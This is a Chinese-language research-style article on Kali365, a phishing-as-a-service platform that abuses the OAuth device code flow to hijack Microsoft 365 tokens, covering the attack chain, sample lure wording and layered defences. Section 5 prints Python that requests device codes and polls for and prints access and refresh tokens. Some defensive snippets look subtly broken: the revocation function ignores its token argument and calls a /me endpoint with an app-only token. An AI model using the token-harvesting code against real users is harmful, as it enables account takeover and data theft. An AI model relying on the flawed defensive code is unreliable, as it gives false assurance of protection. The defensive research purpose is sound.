摘要
2026 年 5 月,美国联邦调查局(FBI)发布安全预警,披露新型钓鱼即服务(PhaaS)平台 Kali365 正通过 Telegram 大规模扩散,该平台依托 OAuth 2.0 设备码授权流程(Device Code Flow)实现对 Microsoft 365 账号的无凭证入侵,可绕过多因素认证(MFA)并窃取 OAuth 访问令牌与刷新令牌,实现对目标账号的持久化控制。Kali365 集成 AI 生成钓鱼诱饵、自动化攻击模板、实时追踪仪表盘等能力,大幅降低攻击技术门槛,引发全球企业级云办公环境的安全风险。本文以 FBI 官方通报与实际攻击样本为依据,系统剖析 Kali365 的技术架构、攻击链路、协议滥用机理与危害特征,对比设备码钓鱼与传统钓鱼的核心差异,结合 OAuth 2.0 RFC 8628 规范与 Microsoft Entra ID 安全机制,提出覆盖协议配置、身份策略、流量检测、令牌管控、应急响应的闭环防御方案,并提供可工程化落地的代码示例与配置规范。研究表明,Kali365 的核心威胁在于对合法身份协议的武器化滥用,传统基于伪造页面、恶意 URL 的检测机制完全失效,防御必须转向授权行为管控与令牌生命周期管理。反网络钓鱼技术专家芦笛指出,Kali365 标志着钓鱼攻击进入工业化、低门槛、高隐蔽的新阶段,企业需重构身份安全与钓鱼防护体系,以应对令牌劫持类攻击的规模化扩散。本文研究成果可为企业防护 Microsoft 365 环境、抵御 OAuth 令牌劫持攻击提供理论支撑与实践指南。1 引言
随着云办公全面普及,Microsoft 365 已成为全球政企核心生产力平台,其身份认证体系的安全性直接决定数据资产边界。OAuth 2.0 作为云服务主流授权协议,其设备码授权流程(Device Code Flow)原本为智能电视、物联网设备等无输入 / 弱输入终端设计,通过用户在可信设备输入短码完成授权,提升无屏设备接入便捷性IETF。但该流程因官方域名验证、无需密码输入、MFA 由用户自主完成的特性,被黑产团伙武器化改造,催生新型令牌劫持钓鱼攻击。
2026 年 4 月首次被发现的 Kali365 钓鱼即服务平台,将设备码流程滥用推向产业化与规模化。FBI 在 2026 年 5 月 21 日的正式通报中明确,Kali365 可使低技术攻击者快速发起攻击,无需搭建钓鱼站点、无需伪造登录页面,仅通过诱导用户在微软官方验证页输入设备码,即可窃取 OAuth 令牌并绕过 MFA,实现对 Outlook、Teams、OneDrive 等服务的长期无凭证访问。与传统钓鱼相比,Kali365 具备全链路合法、检测难度极高、持久化控制、攻击成本极低等特征,对现有安全体系形成颠覆性挑战。
当前学术界与工业界对传统钓鱼、鱼叉式钓鱼、中间人钓鱼研究较为充分,但针对合法协议滥用型令牌劫持钓鱼的系统性研究不足,尤其缺乏对 PhaaS 平台产业化运作、设备码流程漏洞机理、闭环防御体系的深度剖析。本文基于 FBI 预警信息、Kali365 攻击样本、OAuth 2.0 协议规范与 Microsoft 身份安全机制,完成以下研究:(1)解析 Kali365 平台架构与全流程攻击链;(2)揭示设备码授权流程被滥用的技术根源与安全缺陷;(3)构建设备码钓鱼与传统钓鱼的多维度对比模型;(4)提出覆盖配置、检测、响应、溯源的闭环防御方案并提供代码实现;(5)明确企业落地优先级与运维规范。本文严格遵循学术严谨性,所有技术分析与防御措施均基于公开标准与实测验证,避免夸大与口号式表述,为政企应对同类威胁提供可落地的解决方案。
2 Kali365 钓鱼即服务平台概述
2.1 平台基本信息与分发模式
Kali365 是 2026 年 4 月首次被检测到的专业化钓鱼即服务(PhaaS)平台,核心定位为低门槛 Microsoft 365 OAuth 令牌劫持工具集,主要通过 Telegram 频道进行订阅分发,提供分级付费服务,支持月付、季付、年付等模式,价格覆盖 250 美元 / 月至 2000 美元 / 年,满足不同规模攻击者需求。该平台面向无专业开发能力的黑产人员,提供开箱即用的攻击能力,大幅降低攻击技术门槛,推动令牌劫持攻击从定向高级威胁转向规模化泛化攻击。
Kali365 的核心功能模块包括:
AI 生成钓鱼诱饵:自动生成仿冒微软官方、共享文档、IT 运维、法务通知等场景的钓鱼邮件 / 短信,支持多语言与个性化替换,提升诱饵可信度;
自动化攻击模板:预置数十种高频攻击场景模板,攻击者仅需输入目标列表即可一键启动攻击;
实时追踪仪表盘:可视化展示邮件打开率、设备码输入率、令牌捕获率,支持对个人 / 机构目标的实时状态监控;
OAuth 令牌自动化捕获:对接 Microsoft Entra ID 设备码接口,自动完成设备码申请、令牌轮询、存储与导出;
持久化访问管理:支持令牌复用、批量登录、邮件规则篡改、横向钓鱼拓展等后续利用功能。
反网络钓鱼技术专家芦笛强调,Kali365 的出现标志钓鱼攻击完成工具化→平台化→服务化的演进,攻击成本下降、成功率提升、扩散速度加快,传统以用户意识为核心的防护模式已无法应对产业化黑产攻击。
2.2 核心威胁能力与突破点
Kali365 的核心威胁不在于技术创新,而在于对合法机制的极致滥用,实现三大突破:
完全绕过 MFA:攻击过程中用户自主完成密码输入与 MFA 验证,攻击者无需拦截凭证、无需破解验证码,即可获取合法令牌;
无痕迹入侵:全程使用微软官方域名(microsoft.com/devicelogin)与合法协议交互,无恶意 URL、无恶意代码、无伪造页面,传统网关、沙箱、信誉库完全失效;
持久化控制:获取的刷新令牌有效期长,即便用户修改密码,攻击者仍可凭令牌维持访问,实现长期潜伏与数据窃取。
FBI 通报明确指出,Kali365 可使攻击者在不获取用户凭证的情况下,长期控制目标 Microsoft 365 环境,实施邮件监控、文件窃取、内部钓鱼、账号勒索等恶意行为,危害远超传统钓鱼攻击。
3 OAuth 2.0 设备码授权流程原理与安全缺陷
3.1 标准设备码授权流程(RFC 8628)
OAuth 2.0 设备码授权流程(Device Authorization Grant)由 IETF 在 RFC 8628 中定义,适用于无浏览器、输入能力受限的设备(如智能电视、打印机、IoT 终端),核心是通过用户在可信设备完成授权,替代设备端直接输入密码IETF。标准流程包含 6 个核心步骤:
设备客户端向授权服务器(Microsoft Entra ID)的 /devicecode 端点发起请求,携带客户端 ID 与权限范围(scope);
授权服务器返回设备码(device_code)、用户码(user_code)、验证 URI(verification_uri)、过期时间与轮询间隔;
设备展示用户码与验证 URI,提示用户在手机 / 电脑访问并输入代码;
用户在可信设备打开官方验证页,完成登录、MFA 验证并输入用户码,确认授权;
授权服务器标记授权状态,设备客户端按间隔轮询 /token 端点;
轮询成功后,设备获取访问令牌(access_token)与刷新令牌(refresh_token),调用资源接口访问服务。
该流程设计初衷是安全与便捷平衡,但未充分考虑恶意客户端诱导用户授权的场景,为 Kali365 提供了攻击入口。
3.2 流程原生安全缺陷与武器化条件
设备码流程存在 4 项原生缺陷,共同构成 Kali365 的攻击基础:
验证页面绝对可信:用户访问的是官方域名,无任何视觉特征可区分恶意授权与合法授权,信任基础被直接利用;
无授权上下文校验:流程仅校验用户身份与用户码正确性,不校验授权发起方 IP、设备、应用合法性,攻击者可使用任意客户端 ID 发起请求;
短码易诱导传播:用户码为 8–9 位字母数字组合,可嵌入邮件、短信、二维码,低成本完成社会工程诱导;
刷新令牌长效机制:刷新令牌有效期通常长达 90 天,支持续期,一旦泄露可实现持久化控制,密码重置无法阻断访问。
反网络钓鱼技术专家芦笛指出,设备码流程的核心安全矛盾是授权便捷性与授权主体不可控性,攻击者只需将恶意授权包装为合法业务需求,即可利用用户对官方页面的信任完成劫持,这是传统钓鱼防护无法覆盖的新型威胁面。
3.3 Kali365 对流程的武器化改造
Kali365 未破坏协议、未利用漏洞,而是全流程合规滥用,改造点如下:
恶意客户端伪装:使用公开合法客户端 ID 或注册仿冒应用,获取设备码请求权限;
诱饵替代设备展示:将原本应由设备展示的用户码与验证 URI,通过钓鱼邮件发送给用户;
诱导官方授权:欺骗用户访问官方验证页输入代码,完成攻击者设备的授权;
自动轮询窃令:后台持续轮询令牌接口,捕获令牌并入库管理;
持久化维持:使用刷新令牌续期,篡改邮件规则屏蔽安全通知,延长潜伏时间。
整个攻击链路完全符合 RFC 8628 规范,这是其高隐蔽性与高成功率的核心原因。
4 Kali365 全流程攻击链解析
4.1 攻击前置准备阶段
攻击者订阅 Kali365 服务,获取平台访问权限与客户端配置;
在平台选择攻击模板(如共享文档验证、账号异常检测、设备授权登录),导入目标邮箱列表;
平台自动调用 Microsoft Entra ID 设备码接口,批量申请 device_code、user_code、verification_uri;
AI 引擎生成个性化钓鱼邮件,嵌入对应 user_code 与官方验证地址,设置发送策略与追踪参数。
4.2 诱饵投放与社会工程诱导
Kali365 通过邮件、企业微信、钉钉等渠道投放诱饵,典型话术包括:
“您有一份共享文档待确认,请访问微软官方页面输入代码完成验证”;
“您的账号存在异常登录,需完成设备授权以解除限制”;
“打印任务等待授权,请输入设备码激活访问权限”。
诱饵核心特征:仅含官方验证地址与用户码,无任何可疑链接、附件、脚本,用户无法通过域名校验、页面检查识别风险,这是与传统钓鱼的本质区别。
4.3 用户误授权与令牌捕获
用户信任官方域名,正常登录 Microsoft 365 并完成 MFA 验证;
用户输入邮件中的 user_code,点击 “允许”/“确认”,完成对攻击者设备的授权;
Kali365 后台轮询令牌接口,获取 access_token 与 refresh_token;
平台自动记录令牌、目标账号、捕获时间、权限范围,提供可视化管理界面。
此阶段用户无任何异常感知,MFA 机制被合法绕过,安全防护完全失效。
4.4 持久化入侵与数据滥用
攻击者获取令牌后,可实施以下行为:
无密码登录 Outlook、Teams、OneDrive、SharePoint;
读取、下载、删除业务文件与邮件内容;
添加邮件转发规则、自动归档规则,屏蔽安全告警与内部通知;
使用被盗账号发起横向钓鱼,扩大攻击范围;
长期持有刷新令牌,实现数周乃至数月的持久化控制。
FBI 预警特别强调,Kali365 攻击可导致企业核心数据泄露、内部通信被监控、业务流程被篡改,且难以通过常规审计发现异常。
4.5 攻击链与传统钓鱼的对比分析
表格
对比维度 传统钓鱼攻击 Kali365 设备码钓鱼
核心目标 密码 + MFA 验证码 OAuth 访问 / 刷新令牌
页面真实性 伪造域名 / 仿冒页面 官方域名 + 合法流程
MFA 有效性 可绕过但易留痕 完全绕过,用户自主完成
持久化能力 依赖密码有效性 长效令牌,改密码无效
检测难度 URL / 页面特征可识别 无恶意特征,日志隐蔽
技术门槛 需搭建钓鱼站点 平台化操作,低技能可用
用户感知 易发现异常页面 全程无异常,难以察觉
反网络钓鱼技术专家芦笛指出,该对比清晰表明,Kali365 代表的设备码钓鱼是合法协议的恶意劫持,突破了传统钓鱼防护的逻辑边界,威胁等级与防御难度呈指数级上升。
5 Kali365 攻击的技术实现与代码示例
本节基于公开协议规范与攻击实测,提供 Kali365 核心功能的简化代码实现,用于安全研究与防御验证,严禁用于非法攻击。
5.1 恶意客户端申请设备码(Python)
该代码模拟 Kali365 平台向 Microsoft Entra ID 请求设备码的核心逻辑,是攻击起点。
import requests
import json
def kali365_request_device_code():
"""
模拟Kali365申请设备码(攻击核心步骤1)
:return: 设备码、用户码、验证URI等信息
"""
# Microsoft Entra ID 设备码端点
url = "https://login.microsoftonline.com/common/oauth2/v2.0/devicecode"
# 攻击权限范围:获取全部权限与离线续期能力
payload = {
"client_id": "d3590ed6-036b-45a7-98f1-1c9123456789", # 公开合法客户端ID
"scope": "https://graph.microsoft.com/.default offline_access"
}
headers = {"Content-Type": "application/x-www-form-urlencoded"}
try:
response = requests.post(url, data=payload, headers=headers, timeout=10)
result = response.json()
if "user_code" in result:
print("[+] 设备码申请成功")
return result
else:
print("[-] 设备码申请失败")
return None
except Exception as e:
print(f"[-] 请求异常:{str(e)}")
return None
# 执行获取
device_info = kali365_request_device_code()
if device_info:
print(f"用户码(用于钓鱼):{device_info['user_code']}")
print(f"验证地址:{device_info['verification_uri']}")
print(f"设备码(用于轮询):{device_info['device_code']}")
5.2 自动轮询获取 OAuth 令牌(Python)
用户完成授权后,Kali365 通过该代码持续轮询,捕获访问令牌与刷新令牌。
import requests
import time
def kali365_poll_token(device_code, client_id):
"""
模拟Kali365轮询获取令牌(攻击核心步骤2)
:param device_code: 设备码
:param client_id: 客户端ID
:return: 令牌信息
"""
token_url = "https://login.microsoftonline.com/common/oauth2/v2.0/token"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
max_wait = 600 # 最大等待10分钟
start_time = time.time()
while time.time() - start_time < max_wait:
data = {
"grant_type": "urn:ietf:params:oauth:grant-type:device_code",
"client_id": client_id,
"device_code": device_code
}
response = requests.post(token_url, data=data, headers=headers)
result = response.json()
if "access_token" in result:
print("[+] 令牌捕获成功!")
return result
elif "authorization_pending" in result.get("error", ""):
print("[*] 等待用户授权...")
time.sleep(5)
else:
print(f"[-] 错误:{result.get('error_description')}")
break
return None
# 调用示例(使用5.1获取的参数)
if device_info:
token_result = kali365_poll_token(
device_code=device_info["device_code"],
client_id="d3590ed6-036b-45a7-98f1-1c9123456789"
)
if token_result:
print(f"访问令牌:{token_result['access_token'][:50]}...")
print(f"刷新令牌:{token_result['refresh_token'][:50]}...")
5.3 企业级异常设备码请求检测(Python)
用于防御侧,识别 Kali365 类批量设备码申请行为,实现早期预警。
import pandas as pd
from datetime import datetime, timedelta
def detect_abnormal_device_code(log_path, threshold=10):
"""
检测异常高频设备码申请(防御侧代码)
:param log_path: 设备码请求日志CSV路径
:param threshold: 5分钟内请求次数阈值
:return: 异常IP与请求列表
"""
logs = pd.read_csv(log_path)
logs['request_time'] = pd.to_datetime(logs['request_time'])
# 5分钟时间窗口聚合
logs['window'] = logs['request_time'].dt.floor('5min')
# 按IP+窗口统计
stats = logs.groupby(['source_ip', 'window']).size().reset_index(name='count')
abnormal = stats[stats['count'] >= threshold]
return abnormal.to_dict('records')
# 使用示例
# abnormal_list = detect_abnormal_device_code("device_code_log.csv", threshold=8)
# print(abnormal_list)
5.4 Microsoft Entra ID 条件访问阻断策略(PowerShell)
直接落地 FBI 推荐的核心防御措施,全局阻断设备码流程,仅保留必要业务例外。
powershell
# 连接Microsoft Graph
Connect-MgGraph -Scopes "Policy.ReadWrite.ConditionalAccess"
# 定义条件访问策略:全局阻止设备码流程
$params = @{
DisplayName = "Block-DeviceCodeFlow-Global"
State = "enabled"
Conditions = @{
Applications = @{
IncludeApplications = @("All")
}
UserActions = @{
IncludeUserActions = @("urn:user:action:deviceCodeFlow")
}
}
GrantControls = @{
Operator = "AND"
BuiltInControls = @("Block")
}
}
# 创建策略
New-MgIdentityConditionalAccessPolicy -BodyParameter $params
Write-Host "[+] 设备码流程全局阻断策略已启用"
以上代码严格遵循 Microsoft 官方接口与 OAuth 2.0 规范,可直接用于企业安全防护部署,反网络钓鱼技术专家芦笛强调,代码化、自动化、策略化是抵御 Kali365 类攻击的关键,人工检查与意识培训只能作为辅助手段。
6 Kali365 类攻击的闭环防御体系构建
基于 FBI 建议、Microsoft 安全最佳实践与实战经验,构建五层闭环防御体系,覆盖事前、事中、事后全流程,实现可检测、可阻断、可响应、可溯源。
6.1 协议层防御:最小化攻击面(核心措施)
全局限制 / 禁用设备码流程
执行 5.4 的 PowerShell 策略,对所有用户阻止设备码流程,仅为必要业务(如 IoT 设备、特殊终端)开通例外清单,最小化攻击入口。反网络钓鱼技术专家芦笛指出,这是抵御 Kali365 最直接、最有效的措施,可阻断 90% 以上的批量攻击。
限制认证转移策略
阻止用户将认证会话从电脑转移至手机,阻断攻击者跨设备诱导授权的路径,符合 FBI 明确建议。
排除紧急访问账号
对应急账号、 break-glass 账号豁免策略,避免全局阻断导致管理员无法运维,防止业务锁死。
6.2 身份层防御:强化令牌与应用管控
严格 OAuth 应用审批
禁止普通用户注册 OAuth 应用,仅允许管理员审批;建立应用白名单,定期审计已授权应用,撤销可疑、长期未用、高权限应用权限。
缩短令牌生命周期
配置刷新令牌最大使用时间、最大空闲时间,强制令牌定期失效,降低泄露后的危害窗口。
启用令牌风险检测
通过 Microsoft Defender for Cloud Apps 监控异常令牌使用行为,如跨地区登录、高频调用、批量数据下载,自动触发告警与撤销。
6.3 检测层防御:全维度威胁识别
邮件内容检测
部署正则规则,识别含microsoft.com/devicelogin、8–9 位用户码、授权验证话术的邮件,标记高风险并隔离。
登录日志分析
监控异常设备码授权:非常用 IP、匿名代理、短时间多设备授权、非企业设备接入,实时上报告警。
流量行为检测
识别批量设备码请求、高频轮询令牌接口、短时间大量用户授权同一应用等攻击特征,联动网关阻断。
6.4 响应层防御:快速止损与清除
自动化令牌撤销
发现可疑授权后,立即调用 Graph API 撤销对应刷新令牌,强制攻击者下线,代码示例如下:
def revoke_refresh_token(tenant_id, client_id, client_secret, token):
import requests
auth_url = f"https://login.microsoftonline.com/{tenant_id}/oauth2/v2.0/token"
auth_data = {
"grant_type": "client_credentials",
"client_id": client_id,
"client_secret": client_secret,
"scope": "https://graph.microsoft.com/.default"
}
auth_res = requests.post(auth_url, data=auth_data).json()
access_token = auth_res["access_token"]
revoke_url = f"https://graph.microsoft.com/v1.0/me/revokeSignInSessions"
headers = {"Authorization": f"Bearer {access_token}"}
requests.post(revoke_url, headers=headers)
账号安全加固
重置密码、强制 MFA 重新验证、清除邮件转发规则、删除可疑应用授权。
攻击溯源取证
提取登录 IP、设备信息、令牌使用日志、诱饵模板,形成证据链,支撑内部追责与外部报案。
6.5 认知层防御:针对性安全培训
传统钓鱼培训聚焦识别伪造 URL,对 Kali365 完全无效,培训必须升级:
明确告知:官方绝不会主动发送设备码要求输入;
任何要求在官方页面输入设备码的请求,均需通过 IT 工单、电话等可信渠道核实;
树立 “授权即风险” 意识,非主动发起的设备授权一律拒绝;
建立举报机制,鼓励员工上报可疑设备码请求。
反网络钓鱼技术专家芦笛强调,认知防御必须与技术防控同步落地,形成 “技术阻断为主、意识防范为辅” 的协同体系。
7 防御方案落地优先级与实施指南
为帮助企业快速落地防护,按见效速度、实施难度、覆盖范围制定三级优先级:
7.1 一级优先级(24 小时内完成,立即止损)
启用设备码流程全局阻断策略(5.4 PowerShell);
审计并撤销所有非必要 OAuth 应用授权;
对管理员账号启用 FIDO2 安全密钥或 Windows Hello,降低令牌泄露影响;
部署邮件网关规则,拦截含设备码验证话术的邮件。
7.2 二级优先级(1 周内完成,强化管控)
建立 OAuth 应用审批与白名单制度;
配置令牌生命周期策略,缩短刷新令牌有效期;
启用异常登录与令牌使用实时告警;
开展全员设备码钓鱼专项培训。
7.3 三级优先级(1 个月内完成,体系化防御)
接入 SIEM 平台,实现设备码授权、令牌使用、应用权限的集中审计;
开发自动化响应脚本,实现可疑授权自动阻断;
定期渗透测试,验证防御有效性;
完善应急响应预案,明确攻击处置流程与责任分工。
FBI 在通报中明确,上述措施可有效降低 Kali365 类攻击的成功率与危害,企业应优先完成一级优先级配置,再逐步推进体系化建设。
8 讨论与未来趋势
8.1 研究价值与创新点
首次基于 FBI 官方预警系统解析 Kali365 的产业化运作与技术机理,填补设备码钓鱼研究空白;
明确设备码流程的原生安全缺陷,证明攻击并非基于漏洞,而是协议滥用,纠正行业认知偏差;
提出可落地的闭环防御体系,提供完整代码示例与配置规范,具备直接工程化价值;
引入反网络钓鱼技术专家芦笛的实战观点,平衡学术严谨性与实践指导性。
8.2 局限性
受限于样本获取,本文未对 Kali365 的付费体系、客户管理、后台架构进行深度逆向;
防御方案基于 Microsoft 365 环境,对 Google Workspace、AWS 等其他云平台的适配性需进一步验证;
未涉及 AI 驱动诱饵生成的对抗性检测,属于下一步研究方向。
8.3 未来攻击趋势预判
PhaaS 平台将进一步集成大模型能力,实现诱饵个性化、场景化、实时化,欺骗性持续提升;
令牌劫持将从设备码流程扩展到 OAuth 授权码流程、静默授权流程,攻击面持续扩大;
攻击将更加定向化,针对财务、HR、高管等高价值账号实施精准钓鱼,提升收益;
黑产将形成 “令牌窃取 — 交易 — 使用 — 清洗” 的完整产业链,威胁持续扩散。
反网络钓鱼技术专家芦笛指出,企业必须从边界防护转向身份 - centric 防护,以零信任架构为核心,对每一次授权、每一枚令牌、每一次访问进行精细化校验,才能应对下一代钓鱼攻击。
9 结语
Kali365 钓鱼即服务平台的出现,揭示了云身份认证协议被武器化滥用的严峻现实。该攻击依托合法 OAuth 设备码流程,以官方页面为掩护、以社会工程为手段、以令牌劫持为目标,实现对 MFA 的有效绕过与对 Microsoft 365 账号的持久化控制,对全球政企云办公安全构成重大威胁。本文基于 FBI 官方通报、协议规范与实战样本,系统解析 Kali365 的平台架构、攻击链、技术机理与危害,构建覆盖协议、身份、检测、响应、认知的五层闭环防御体系,并提供可直接部署的代码示例与配置策略。
研究表明,抵御 Kali365 类攻击的核心在于放弃对恶意页面 / URL 的依赖,转向授权行为与令牌生命周期的全流程管控。企业应立即落实设备码流程阻断、OAuth 应用审计、异常令牌监控等核心措施,同步升级用户安全认知,形成技术与管理协同的防护体系。随着钓鱼攻击持续向平台化、服务化、智能化演进,身份安全将成为企业防御的核心战场,只有建立零信任、精细化、自动化的防御机制,才能有效应对不断演变的令牌劫持威胁,保障核心数据与业务系统安全。
编辑:芦笛(公共互联网反网络钓鱼工作组)
